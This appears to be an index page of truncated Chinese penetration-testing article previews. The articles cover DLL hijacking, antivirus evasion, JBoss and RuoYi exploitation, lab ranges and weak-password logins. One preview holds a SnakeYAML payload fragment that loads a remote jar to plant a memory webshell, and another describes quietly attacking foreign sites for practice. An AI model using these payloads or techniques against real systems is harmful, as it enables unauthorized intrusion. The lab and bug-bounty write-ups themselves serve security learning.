基础知识 Windows 操作系统通过“DLL路径搜索目录顺序”和“Know DLLs注册表项”的机制来确定应用程序所要调用的DLL的路径,之后,应用程序就将DLL载入了自己的内存空间,执行相应的函数功能。 DLL路径搜索目录顺序 1.程序所在目录 2.程序加载目录(SetCurrentDirectory) 3.系统目录即 SYSTEM32 目录 4.16位系统目录即 SYSTEM 目录 5.Wi
曲折的命令执行回显 0x01.命令执行 日常漏洞挖掘中发现了一处若依系统,进入后台后尝试使用常规方法加载jar包来注入内存马 org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://vps/yaml-payload-f
渗透测试中一些常规技巧的分享 webshell情况下目标主机不出网: 在渗透测试中常常会遇到目标不出网的情况,常见的解决方法我们一般通过上传pystinger,regeorg等工具走http代理 其实我们可以通过冰蝎的代理配合Proxifier来快速代理 下面是演示: 这样就无需上传文件达到快速配置代理请求 cs上线目标3389远程连接时遇到360拦截或者没有抓取到密码权限不够无法创建用户:
这是国外老哥2020年提出的一种蛮有意思的思路。 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。(本文仅用于交流学习) 大致思路 我们先来看看大致的思路是什么样子的,然后来看看一些需要学习的点。 首先我们需要获得调式权限(SeDebugPrivilege) 然后我们使用NtQuerySystemInformation生成所有进
1、发现与利用公众号接口的安全漏洞 某120公众号提供了一处考核平台,通过浏览器处打开该网站。 打开可以看到一处密码登录口,试了一下常用的手机号和密码,没有登录成功。 这个时候扫个目录吧。扫到了一处管理员页面:/index.php?c=home&action=admin_login 管理员弱口令 使用弱口令admin123,登录成功了,看一看,没有可以上传的点 前台弱口令 在bur
前言经过上传替换私钥拿服务器之后,这次又碰到一个类似的 但和以往不同的是,没开启私钥登录,也没有私钥文件。 不同的系统,加载的同一套第三方上传框架 看看对应端口打开没 存在,打开是空白 fuzz下上传的接口,404 打开之前拖出来的代码看看还有那些接口来着 直接搜索关键词upload 获取接口后,访问看看 表单解析失败,尝试post上传 老办法通过替换秘钥链接服务器 ../../
前言 MSF是一个功能强大的渗透测试工具,它可以帮助安全研究人员和渗透测试人员识别漏洞、开发漏洞利用和执行攻击,而Powershell作为内置于Windows操作系统中的功能强大的脚本语言,其本身具有执行命令、访问操作系统API、访问文件系统等强大的功能。此外,Powershell还具有使用内存进行攻击、绕过安全防御系统检测等特性,因此它可以成为攻击者进行内网渗透的理想工具。本文将演示本地Powe
Windows defender 介绍 Microsoft Defender 防病毒软件在 Windows 10 和 Windows 11 以及 Windows Server 版本中可用。 Microsoft Defender 防病毒软件是 Microsoft Defender for Endpoint 中下一代保护的主要组件。这种保护将机器学习、大数据分析、深入的威胁防御研究和 Microsof
网络拓扑图: 整个环境共四台目标机,分别处在三层内网环境当中。 DMZ区环境IP段为 192.168.31.0/24(设置桥接模式) DMZ区的靶机拥有两个网卡,一个用来对外提供服务,一个用来连通第二次网络。 第二层网络环境IP段为 10.10.20.0/24 第二层网络的靶机同样有两个网卡,一个连通第二层网络,一个连通第三层网络 第三层网络环境IP段为 10.10.10.0/24 第三层
工具准备 jexboss Kali Linux CS 4.3 Windows杀软在线查询一 Windows杀软在线查询二 Windows杀软在线查询三 fscan 潮汐shellcode免杀 LSTAR CobaltStrike其他插件 PEASS-ng PrintSpoofer 外网打点 1、为了练习内网横向,悄悄的盯上国外的站点 2、发现jboss网站存在反序列化漏洞,是呀jexboss无法利
工具准备 jexboss Kali Linux CS 4.3 Windows杀软在线查询一 Windows杀软在线查询二 Windows杀软在线查询三 BrowserGhost fscan 向日葵 外网打点 1、在一次红蓝对抗时,发现了jboss反序列化漏洞,真的是老天爷赏饭吃 2、利用jexboss直接拿shell python jexboss.py -u http://xx.xx.xx.xx
前言: 本套靶场来源于渗透攻击红队, 环境: webloginc主机: 公网地址:192.168.2.11 内网地址:10.10.20.12 个人域主机:(redteam.com/) 网卡1:10.10.20.7 网卡2:10.10.10.7(域网段) sqlserver主机:(redteam/sqlserver-2008) 设置了非约束委派和约束委派 10.10.10.18 域控主机:(red
@深信服-深蓝攻防实验室-zxcvbn 必要性 前后端分离已经成为web的一大趋势,通过Tomcat+Ngnix(也可以中间有个Node.js),有效地进行解耦。并且前后端分离会为以后的大型分布式架构、弹性计算架构、微服务架构、多端化服务(多种客户端,例如:浏览器,车载终端,安卓,IOS等等)打下坚实的基础。而API就承担了前后端的通信的职责。所以学习api安全很有必要。 本文的思路在于总结一些a
第一个靶场- 前记:第一个靶场给出提示“非http协议访问” 0x01 浏览器访问地址 没错!就是打不开。正如题目所说的一样非http协议。 真是搞不懂不是http协议,但是给出的地址是http://ip:端口 呵呵笑了! 0x02 给出了端口,那就扫一下吧。 nmap扫面端口: nmap -sV -sC -A -T4 ip地址 -p 端口 nmap -sV --version-int
前言 以下提及的漏洞都提交到edusrc平台进行修复,大佬勿喷。 信息收集 在外网进行系统测试,发现大部分都需要统一身份认证,瞅瞅该目标单位的统一身份认证要求,可以看到初始密码的规则是 xxxx@SFZ后六位,用户名是学号 利用相关语法 site:xxx.edu.cn "学号|SFZ|密码"等,未找到有效信息,想到用类似 "助学金、奖学金、补贴"等关键词,发现一处敏感信息泄露,及时保存下来,没准